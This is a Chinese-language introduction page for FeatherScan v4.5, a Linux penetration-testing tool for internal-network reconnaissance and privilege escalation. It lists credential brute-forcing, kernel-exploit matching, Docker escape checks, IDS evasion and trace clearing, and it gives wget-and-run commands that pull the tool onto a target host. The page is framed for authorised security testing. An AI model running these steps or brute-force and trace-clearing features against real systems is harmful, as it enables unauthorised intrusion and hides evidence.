介绍
FeatherScan是一款专为Linux系统设计的自动化内网渗透与特权提升扫描工具,由泷羽Sec作者白小羽开发。该工具旨在简化渗透测试过程中的内网信息收集和提权检测环节,通过自动化扫描显著减少手工操作时间,帮助安全研究人员高效识别系统弱点。
这个工具采用并行的执行方式,而不是同步执行,这样的话会显著提升脚本的执行速度,不然光一个IP内网扫描(三种协议同时扫)
作用
┌──(root㉿kali)-[/data/FeatherScan/FeatherScan_v4_5_]
└─# ./FeatherScan_v4_5
███████╗███████╗ █████╗ ████████╗██╗ ██╗███████╗██████╗
██╔════╝██╔════╝██╔══██╗╚══██╔══╝██║ ██║██╔════╝██╔══██╗
█████╗ █████╗ ███████║ ██║ ███████║█████╗ ██████╔╝
██╔══╝ ██╔══╝ ██╔══██║ ██║ ██╔══██║██╔══╝ ██╔══██╗
██║ ███████╗██║ ██║ ██║ ██║ ██║███████╗██║ ██║
╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
高级Linux特权提升扫描工具
泷羽Sec官网:https://longyusec.com | 作者:白小羽 | v:baibaixiaoyu2024 | v4.5
只要还有明天,今天就永远是起跑点,所以不要害怕从零开始!
=================================================== 工具描述 =================================================
1、linux内网信息收集,全面收集操作系统/内核版本、环境变量、用户信息等关键数据
2、检测敏感文件权限、容器环境、服务配置等安全风险点,分析历史命令、环境变量、SSH配置等潜在攻击向量
3、智能主机发现(ARP/Ping/TCP混合扫描),多协议服务爆破(SSH/MySQL/SMB等),网络路由分析、DNS配置检测和代理设置审查
4、SUID/SGID文件扫描与危险程序识别,内核漏洞数据库匹配(脏牛、脏管道等),Sudo规则审计与配置弱点分析
5、Docker逃逸路径检测和容器安全评估,隐身扫描模式(避免触发IDS),自动化痕迹清除机制,敏感信息掩码保护
$
=================================================== 免责条款 =================================================
1、在使用本工具之前,请确保您拥有对该机器的测试权限,不得非法入侵除您本人以外的,以及未授权的系统进行扫描或攻击等恶意行为。对于因非法使用本工具而产生的一切法律责任,由用户自行承担,泷羽 Sec 安全团队概不负责。
2、用户不得对本工具进行反编译、逆向工程、修改源代码、解密等任何试图破解或篡改本工具的行为。
3、如果需要商业版(源码版),请联系泷羽Sec安全团队的白小羽进行授权,v:baibaixiaoyu2024
4、本工具创建的初衷就是方便干网安的师傅们学习交流使用,再次强调还请不要进行非法用途,谢谢您————此致,敬礼
[?] 是否接受本协议?[Y/n]
y
[-] 您已接受该协议!程序即将开始运行。。
[-] 系统信息
[+] 当前用户: root
[+] 主机名: kali
[+] 操作系统: Kali GNU/Linux Rolling
[+] 内核版本: 6.12.25-amd64
[+] 扫描开始时间: Mon Jul 28 04:02:23 AM EDT 2025
[?] 是否执行深入检查?
普通检查: 快速检测常见提权向量 (SUID, 可写文件, 内核漏洞等)
深入检查: 包括普通检查 + 服务爆破 + 敏感文件深度扫描 [y/N]
^C
pass.txt :用于爆破的密码字典,比如横向移动的mysql,ssh密码爆破
user.txt : 爆破时候用的用户字典,脚本中也有默认的账号密码弱口令进行爆破
feather_vuln_db.txt : linux提权exploit-db漏洞库,需要同FeatherScan一起上传到靶机
generate_vuln_db.sh : 在kali上执行,这是一个筛选脚本,用于获取最新的linux提权explod-db漏洞库,kali中更新本地漏洞库使用命令 searchsploit -u ,再执行这个脚本,会生成一个txt漏洞库,也就是 feather_vuln_db.txt
靶机:
wget http://ip:port/FeatherScan_v4_5
wget http://ip:port/feather_vuln_db.txt
chmod +x FeatherScan_v4_5
./FeatherScan_v4_5
- 此程序需在linux系统上运行
-
打开文件夹
-
./FeatherScan_v4_5接下来就很简单了,跟着指示填写就行
下载
![表情[ciya] - 极核GetShell](https://get-shell.com/wp-content/themes/zibll/img/smilies/ciya.gif)
